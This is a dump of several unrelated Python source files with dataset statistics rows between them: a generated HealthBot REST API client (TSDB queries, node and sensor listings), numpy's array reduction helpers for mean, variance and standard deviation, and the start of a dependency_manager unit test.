_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
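# A usage sketch for the TSDB query interface above (the database, group,
# device and measurement names are illustrative assumptions, not real
# endpoints):
#
# >>> api = SystemApi() # falls back to a default ApiClient()
# >>> res = api.query_tsdb(db='db1', device_group='core-routers',
# ... device='r1', measurement='interface-stats',
# ... fields='*', order='desc', limit='10')
# >>> thread = api.query_tsdb(db='db1', device_group='core-routers',
# ... device='r1', q='SELECT ...', async_req=True)
# >>> res = thread.get() # with async_req=True the call returns a thread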
def query_tsdb_post(self, db, device_group, device, **kwargs): # noqa: E501
"""TSDB query # noqa: E501
Query TSDB # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tsdb_post(db, device_group, device, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str db: Name of the database. Multiple databases should be separated by ','. '*' can be used to specify all databases. (required)
:param str device_group: Name of the deviceGroup(s). Multiple device groups should be separated by ','. This can be used in combination with device, but is not mandatory. If device is given, the query will be executed only for those devices in the given device group; otherwise all devices in the group will be considered. Given devices apply to all given device-groups. (required)
:param str device: Name of the device. Multiple devices should be separated by ','. This should be used along with deviceGroup. Without deviceGroup, this config will not be considered. (required)
:param TsdbPostBody tsdb_query_body: Query TSDB body object
:param str measurement: Name of the measurement. Optional if topic/rule/trigger is used
:param str topic: Name of Healthbot topic. Optional if measurement is used
:param str rule: Name of Healthbot rule. Required if topic is used. Optional if measurement is used
:param str trigger: Name of Healthbot trigger. Optional if measurement is used or rule table is being queried
:param str fields: Fields that need to be retrieved. Use * to query all fields. Eg: fields=field1, field2
:param str order: Sort points in descending order based on time. By default points will be sorted in ascending order. Eg: order=desc
:param str group_by: Group results based on specified tags. Use * to group by all tags. Eg: groupBy=key1, key2
:param str limit: Limit number of points in the result. If groupBy is used limit is applied per group. Eg: limit=10
:param str where: Where clause filters data based on fields, tags, and/or timestamps. Eg: where=\"interface-name\" = 'ge-0/0/1' and \"in-pkts\" > 0
:param str q: Influx query string. Use this when the custom query format does not support a query
:return: TsdbResults
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.query_tsdb_post_with_http_info(db, device_group, device, **kwargs) # noqa: E501
else:
(data) = self.query_tsdb_post_with_http_info(db, device_group, device, **kwargs) # noqa: E501
return data
def query_tsdb_post_with_http_info(self, db, device_group, device, **kwargs): # noqa: E501
"""TSDB query # noqa: E501
Query TSDB # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tsdb_post_with_http_info(db, device_group, device, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str db: Name of the database. Multiple databases should be separated by ','. '*' can be used to specify all databases. (required)
:param str device_group: Name of the deviceGroup(s). Multiple device groups should be separated by ','. This can be used in combination with device, but is not mandatory. If device is given, the query will be executed only for those devices in the given device group; otherwise all devices in the group will be considered. Given devices apply to all given device-groups. (required)
:param str device: Name of the device. Multiple devices should be separated by ','. This should be used along with deviceGroup. Without deviceGroup, this config will not be considered. (required)
:param TsdbPostBody tsdb_query_body: Query TSDB body object
:param str measurement: Name of the measurement. Optional if topic/rule/trigger is used
:param str topic: Name of Healthbot topic. Optional if measurement is used
:param str rule: Name of Healthbot rule. Required if topic is used. Optional if measurement is used
:param str trigger: Name of Healthbot trigger. Optional if measurement is used or rule table is being queried
:param str fields: Fields that need to be retrieved. Use * to query all fields. Eg: fields=field1, field2
:param str order: Sort points in descending order based on time. By default points will be sorted in ascending order. Eg: order=desc
:param str group_by: Group results based on specified tags. Use * to group by all tags. Eg: groupBy=key1, key2
:param str limit: Limit number of points in the result. If groupBy is used limit is applied per group. Eg: limit=10
:param str where: Where clause filters data based on fields, tags, and/or timestamps. Eg: where=\"interface-name\" = 'ge-0/0/1' and \"in-pkts\" > 0
:param str q: Influx query string. Use this when the custom query format does not support a query
:return: TsdbResults
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['db', 'device_group', 'device', 'tsdb_query_body', 'measurement', 'topic', 'rule', 'trigger', 'fields', 'order', 'group_by', 'limit', 'where', 'q'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method query_tsdb_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'db' is set
if ('db' not in params or
params['db'] is None):
raise ValueError("Missing the required parameter `db` when calling `query_tsdb_post`") # noqa: E501
# verify the required parameter 'device_group' is set
if ('device_group' not in params or
params['device_group'] is None):
raise ValueError("Missing the required parameter `device_group` when calling `query_tsdb_post`") # noqa: E501
# verify the required parameter 'device' is set
if ('device' not in params or
params['device'] is None):
raise ValueError("Missing the required parameter `device` when calling `query_tsdb_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'db' in params:
query_params.append(('db', params['db'])) # noqa: E501
if 'device_group' in params:
query_params.append(('deviceGroup', params['device_group'])) # noqa: E501
if 'device' in params:
query_params.append(('device', params['device'])) # noqa: E501
if 'measurement' in params:
query_params.append(('measurement', params['measurement'])) # noqa: E501
if 'topic' in params:
query_params.append(('topic', params['topic'])) # noqa: E501
if 'rule' in params:
query_params.append(('rule', params['rule'])) # noqa: E501
if 'trigger' in params:
query_params.append(('trigger', params['trigger'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'order' in params:
query_params.append(('order', params['order'])) # noqa: E501
if 'group_by' in params:
query_params.append(('groupBy', params['group_by'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'where' in params:
query_params.append(('where', params['where'])) # noqa: E501
if 'q' in params:
query_params.append(('q', params['q'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'tsdb_query_body' in params:
body_params = params['tsdb_query_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/octet-stream']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tsdb/query', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TsdbResults', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def retrieve_available_nodes(self, **kwargs): # noqa: E501
"""List of available nodes # noqa: E501
Get the list of available nodes in the installation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_available_nodes(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.retrieve_available_nodes_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.retrieve_available_nodes_with_http_info(**kwargs) # noqa: E501
return data
def retrieve_available_nodes_with_http_info(self, **kwargs): # noqa: E501
"""List of available nodes # noqa: E501
Get the list of available nodes in the installation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_available_nodes_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['x_iam_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method retrieve_available_nodes" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_iam_token' in params:
header_params['x-iam-token'] = params['x_iam_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/nodes/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def retrieve_sensor_device_group(self, device_group_name, **kwargs): # noqa: E501
"""Get all All API's. # noqa: E501
GET sensors subscribed for a device-group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_sensor_device_group(device_group_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str device_group_name: Device Group (required)
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.retrieve_sensor_device_group_with_http_info(device_group_name, **kwargs) # noqa: E501
else:
(data) = self.retrieve_sensor_device_group_with_http_info(device_group_name, **kwargs) # noqa: E501
return data
def retrieve_sensor_device_group_with_http_info(self, device_group_name, **kwargs): # noqa: E501
"""Get all All API's. # noqa: E501
GET sensors subscribed for a device-group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_sensor_device_group_with_http_info(device_group_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str device_group_name: Device Group (required)
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['device_group_name', 'x_iam_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method retrieve_sensor_device_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'device_group_name' is set
if ('device_group_name' not in params or
params['device_group_name'] is None):
raise ValueError("Missing the required parameter `device_group_name` when calling `retrieve_sensor_device_group`") # noqa: E501
collection_formats = {}
path_params = {}
if 'device_group_name' in params:
path_params['device_group_name'] = params['device_group_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_iam_token' in params:
header_params['x-iam-token'] = params['x_iam_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/config/sensor/device-group/{device_group_name}/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def retrieve_system_details(self, **kwargs): # noqa: E501
"""Retrieve system details. # noqa: E501
Retrieve system details for HealthBot system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_system_details(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:param str service_name: name of the service for which details are required.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.retrieve_system_details_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.retrieve_system_details_with_http_info(**kwargs) # noqa: E501
return data
def retrieve_system_details_with_http_info(self, **kwargs): # noqa: E501
"""Retrieve system details. # noqa: E501
Retrieve system details for HealthBot system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_system_details_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:param str service_name: name of the service for which details are required.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['x_iam_token', 'service_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method retrieve_system_details" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'service_name' in params:
query_params.append(('service_name', params['service_name'])) # noqa: E501
header_params = {}
if 'x_iam_token' in params:
header_params['x-iam-token'] = params['x_iam_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/system-details/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def retrieve_tsdb_counters(self, **kwargs): # noqa: E501
"""TSDB counters # noqa: E501
Get TSDB counters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_tsdb_counters(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.retrieve_tsdb_counters_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.retrieve_tsdb_counters_with_http_info(**kwargs) # noqa: E501
return data
def retrieve_tsdb_counters_with_http_info(self, **kwargs): # noqa: E501
"""TSDB counters # noqa: E501
Get TSDB counters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_tsdb_counters_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['x_iam_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method retrieve_tsdb_counters" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_iam_token' in params:
header_params['x-iam-token'] = params['x_iam_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tsdb-counters/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 46.800239 | 404 | 0.632409 | 4,854 | 39,125 | 4.907499 | 0.053976 | 0.046682 | 0.028546 | 0.021158 | 0.959322 | 0.956803 | 0.950212 | 0.94106 | 0.94106 | 0.940179 | 0 | 0.016499 | 0.278083 | 39,125 | 835 | 405 | 46.856287 | 0.826872 | 0.425278 | 0 | 0.823129 | 1 | 0 | 0.19366 | 0.035693 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034014 | false | 0 | 0.00907 | 0 | 0.092971 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c3078c783cbf9f7936e22fdc19076a799c41990a | 152 | py | Python | pyxconv/__init__.py | sheevy/XConv | fbfe52eefb23f6b32645dc837612ce5257b6595e | [
"MIT"
] | 4 | 2021-06-20T14:58:48.000Z | 2021-12-22T16:44:49.000Z | pyxconv/__init__.py | sheevy/XConv | fbfe52eefb23f6b32645dc837612ce5257b6595e | [
"MIT"
] | 1 | 2021-12-21T16:32:04.000Z | 2021-12-21T16:32:04.000Z | pyxconv/__init__.py | sheevy/XConv | fbfe52eefb23f6b32645dc837612ce5257b6595e | [
"MIT"
] | 1 | 2021-12-21T12:20:52.000Z | 2021-12-21T12:20:52.000Z | from .utils import * # noqa
from .probe import * # noqa
from .funcs import * # noqa
from .modules import * # noqa
from .mem_logger import * # noqa
| 25.333333 | 33 | 0.671053 | 21 | 152 | 4.809524 | 0.428571 | 0.49505 | 0.554455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.230263 | 152 | 5 | 34 | 30.4 | 0.863248 | 0.157895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c317358e1aa2223f55bd464e82adc018df9e5bfb | 7,130 | py | Python | numpy/core/_methods.py | WeatherGod/numpy | 5be45b280b258e158b93163b937f8f9c08d30393 | [
"BSD-3-Clause"
] | null | null | null | numpy/core/_methods.py | WeatherGod/numpy | 5be45b280b258e158b93163b937f8f9c08d30393 | [
"BSD-3-Clause"
] | null | null | null | numpy/core/_methods.py | WeatherGod/numpy | 5be45b280b258e158b93163b937f8f9c08d30393 | [
"BSD-3-Clause"
] | null | null | null | """
Array methods which are called by both the C-code for the method
and the Python code for the NumPy-namespace function
"""
from __future__ import division, absolute_import, print_function
from numpy.core import multiarray as mu
from numpy.core import umath as um
from numpy.core.numeric import array, asanyarray, isnan, issubdtype
from numpy.core import numerictypes as nt
def _amax(a, axis=None, out=None, keepdims=False):
return um.maximum.reduce(a, axis=axis,
out=out, keepdims=keepdims)
def _amin(a, axis=None, out=None, keepdims=False):
return um.minimum.reduce(a, axis=axis,
out=out, keepdims=keepdims)
def _sum(a, axis=None, dtype=None, out=None, keepdims=False):
return um.add.reduce(a, axis=axis, dtype=dtype,
out=out, keepdims=keepdims)
def _prod(a, axis=None, dtype=None, out=None, keepdims=False):
return um.multiply.reduce(a, axis=axis, dtype=dtype,
out=out, keepdims=keepdims)
def _any(a, axis=None, dtype=None, out=None, keepdims=False):
return um.logical_or.reduce(a, axis=axis, dtype=dtype, out=out,
keepdims=keepdims)
def _all(a, axis=None, dtype=None, out=None, keepdims=False):
return um.logical_and.reduce(a, axis=axis, dtype=dtype, out=out,
keepdims=keepdims)
def _count_reduce_items(arr, axis):
if axis is None:
axis = tuple(range(arr.ndim))
if not isinstance(axis, tuple):
axis = (axis,)
items = 1
for ax in axis:
items *= arr.shape[ax]
return items
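# For example, given arr.shape == (3, 4):
# _count_reduce_items(arr, None) -> 12 (axis=None covers every axis)
# _count_reduce_items(arr, 0) -> 3
# _count_reduce_items(arr, (0, 1)) -> 12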
def _mean(a, axis=None, dtype=None, out=None, keepdims=False):
arr = asanyarray(a)
# Cast bool, unsigned int, and int to float64
if dtype is None and (issubdtype(arr.dtype, nt.integer) or
issubdtype(arr.dtype, nt.bool_)):
ret = um.add.reduce(arr, axis=axis, dtype='f8',
out=out, keepdims=keepdims)
else:
ret = um.add.reduce(arr, axis=axis, dtype=dtype,
out=out, keepdims=keepdims)
rcount = _count_reduce_items(arr, axis)
if isinstance(ret, mu.ndarray):
ret = um.true_divide(ret, rcount,
out=ret, casting='unsafe', subok=False)
else:
ret = ret / float(rcount)
return ret
def _nanmean(a, axis=None, dtype=None, out=None, keepdims=False):
# Using array() instead of asanyarray() because the former always
# makes a copy, which is important due to the copyto() action later
arr = array(a, subok=True)
mask = isnan(arr)
# Cast bool, unsigned int, and int to float64
if dtype is None and (issubdtype(arr.dtype, nt.integer) or
issubdtype(arr.dtype, nt.bool_)):
ret = um.add.reduce(arr, axis=axis, dtype='f8',
out=out, keepdims=keepdims)
else:
mu.copyto(arr, 0.0, where=mask)
ret = um.add.reduce(arr, axis=axis, dtype=dtype,
out=out, keepdims=keepdims)
rcount = (~mask).sum(axis=axis)
if isinstance(ret, mu.ndarray):
ret = um.true_divide(ret, rcount,
out=ret, casting='unsafe', subok=False)
else:
ret = ret / float(rcount)
return ret
def _var(a, axis=None, dtype=None, out=None, ddof=0,
keepdims=False):
arr = asanyarray(a)
# First compute the mean, saving 'rcount' for reuse later
if dtype is None and (issubdtype(arr.dtype, nt.integer) or
issubdtype(arr.dtype, nt.bool_)):
arrmean = um.add.reduce(arr, axis=axis, dtype='f8', keepdims=True)
else:
arrmean = um.add.reduce(arr, axis=axis, dtype=dtype, keepdims=True)
rcount = _count_reduce_items(arr, axis)
if isinstance(arrmean, mu.ndarray):
arrmean = um.true_divide(arrmean, rcount,
out=arrmean, casting='unsafe', subok=False)
else:
arrmean = arrmean / float(rcount)
# arr - arrmean
x = arr - arrmean
# (arr - arrmean) ** 2
if issubdtype(arr.dtype, nt.complex_):
x = um.multiply(x, um.conjugate(x), out=x).real
else:
x = um.multiply(x, x, out=x)
# add.reduce((arr - arrmean) ** 2, axis)
ret = um.add.reduce(x, axis=axis, dtype=dtype, out=out, keepdims=keepdims)
# add.reduce((arr - arrmean) ** 2, axis) / (n - ddof)
if not keepdims and isinstance(rcount, mu.ndarray):
rcount = rcount.squeeze(axis=axis)
rcount -= ddof
if isinstance(ret, mu.ndarray):
ret = um.true_divide(ret, rcount,
out=ret, casting='unsafe', subok=False)
else:
ret = ret / float(rcount)
return ret
def _nanvar(a, axis=None, dtype=None, out=None, ddof=0,
keepdims=False):
# Using array() instead of asanyarray() because the former always
# makes a copy, which is important due to the copyto() action later
arr = array(a, subok=True)
mask = isnan(arr)
# First compute the mean, saving 'rcount' for reuse later
if dtype is None and (issubdtype(arr.dtype, nt.integer) or
issubdtype(arr.dtype, nt.bool_)):
arrmean = um.add.reduce(arr, axis=axis, dtype='f8', keepdims=True)
else:
mu.copyto(arr, 0.0, where=mask)
arrmean = um.add.reduce(arr, axis=axis, dtype=dtype,
keepdims=True)
rcount = (~mask).sum(axis=axis, keepdims=True)
if isinstance(arrmean, mu.ndarray):
arrmean = um.true_divide(arrmean, rcount,
out=arrmean, casting='unsafe', subok=False)
else:
arrmean = arrmean / float(rcount)
# arr - arrmean
x = arr - arrmean
mu.copyto(x, 0.0, where=mask)
# (arr - arrmean) ** 2
if issubdtype(arr.dtype, nt.complex_):
x = um.multiply(x, um.conjugate(x), out=x).real
else:
x = um.multiply(x, x, out=x)
# add.reduce((arr - arrmean) ** 2, axis)
ret = um.add.reduce(x, axis=axis, dtype=dtype, out=out,
keepdims=keepdims)
# add.reduce((arr - arrmean) ** 2, axis) / (n - ddof)
if not keepdims and isinstance(rcount, mu.ndarray):
rcount = rcount.squeeze(axis=axis)
rcount -= ddof
if isinstance(ret, mu.ndarray):
ret = um.true_divide(ret, rcount,
out=ret, casting='unsafe', subok=False)
else:
ret = ret / float(rcount)
return ret
def _std(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):
ret = _var(a, axis=axis, dtype=dtype, out=out, ddof=ddof,
keepdims=keepdims)
if isinstance(ret, mu.ndarray):
ret = um.sqrt(ret, out=ret)
else:
ret = um.sqrt(ret)
return ret
def _nanstd(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):
ret = _nanvar(a, axis=axis, dtype=dtype, out=out, ddof=ddof,
keepdims=keepdims)
if isinstance(ret, mu.ndarray):
ret = um.sqrt(ret, out=ret)
else:
ret = um.sqrt(ret)
return ret
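# A worked sketch of the variance/std helpers above (doctest-style; these
# are private helpers mirroring np.var/np.std, and `np` is assumed to be
# the usual top-level numpy import):
#
# >>> a = np.array([1.0, 2.0, 3.0, 4.0])
# >>> _var(a) # sum of squared deviations (5.0) / n (4)
# 1.25
# >>> _var(a, ddof=1) # divide by n - ddof = 3 instead
# 1.6666666666666667
# >>> _std(a) == um.sqrt(_var(a))
# True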
| 35.65 | 78 | 0.593548 | 964 | 7,130 | 4.345436 | 0.129668 | 0.043925 | 0.049654 | 0.063022 | 0.871568 | 0.858677 | 0.852709 | 0.852709 | 0.83218 | 0.780377 | 0 | 0.004897 | 0.284011 | 7,130 | 199 | 79 | 35.829146 | 0.815671 | 0.116971 | 0 | 0.710345 | 0 | 0 | 0.007015 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.089655 | false | 0 | 0.034483 | 0.041379 | 0.213793 | 0.006897 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6f1140ce2ffc110e021d6ebfbb8a1ab17e361164 | 77,306 | py | Python | third_party/catapult/dependency_manager/dependency_manager/base_config_unittest.py | maidiHaitai/haitaibrowser | a232a56bcfb177913a14210e7733e0ea83a6b18d | [
"BSD-3-Clause"
] | 1 | 2020-09-15T08:43:34.000Z | 2020-09-15T08:43:34.000Z | third_party/catapult/dependency_manager/dependency_manager/base_config_unittest.py | maidiHaitai/haitaibrowser | a232a56bcfb177913a14210e7733e0ea83a6b18d | [
"BSD-3-Clause"
] | null | null | null | third_party/catapult/dependency_manager/dependency_manager/base_config_unittest.py | maidiHaitai/haitaibrowser | a232a56bcfb177913a14210e7733e0ea83a6b18d | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=unused-argument
import os
import unittest
from catapult_base import cloud_storage
import mock
from pyfakefs import fake_filesystem_unittest
from pyfakefs import fake_filesystem
import dependency_manager
from dependency_manager import uploader
class BaseConfigCreationAndUpdateUnittests(fake_filesystem_unittest.TestCase):
def setUp(self):
self.addTypeEqualityFunc(uploader.CloudStorageUploader,
uploader.CloudStorageUploader.__eq__)
self.setUpPyfakefs()
self.dependencies = {
'dep1': {'cloud_storage_bucket': 'bucket1',
'cloud_storage_base_folder': 'dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1'},
'plat2': {
'cloud_storage_hash': 'hash12',
'download_path': '../../relative/dep1/path2'}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1'},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
self.expected_file_lines = [
# pylint: disable=bad-continuation
'{', '"config_type": "BaseConfig",', '"dependencies": {',
'"dep1": {', '"cloud_storage_base_folder": "dependencies_folder",',
'"cloud_storage_bucket": "bucket1",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "hash11",',
'"download_path": "../../relative/dep1/path1"', '},',
'"plat2": {', '"cloud_storage_hash": "hash12",',
'"download_path": "../../relative/dep1/path2"', '}', '}', '},',
'"dep2": {', '"cloud_storage_bucket": "bucket2",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "hash21",',
'"download_path": "../../relative/dep2/path1"', '},',
'"plat2": {', '"cloud_storage_hash": "hash22",',
'"download_path": "../../relative/dep2/path2"', '}', '}', '}',
'}', '}']
self.file_path = os.path.abspath(os.path.join(
'path', 'to', 'config', 'file'))
self.new_dep_path = 'path/to/new/dep'
self.fs.CreateFile(self.new_dep_path)
self.new_dep_hash = 'A23B56B7F23E798601F'
self.new_dependencies = {
'dep1': {'cloud_storage_bucket': 'bucket1',
'cloud_storage_base_folder': 'dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1'},
'plat2': {
'cloud_storage_hash': self.new_dep_hash,
'download_path': '../../relative/dep1/path2'}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1'},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
self.new_bucket = 'bucket1'
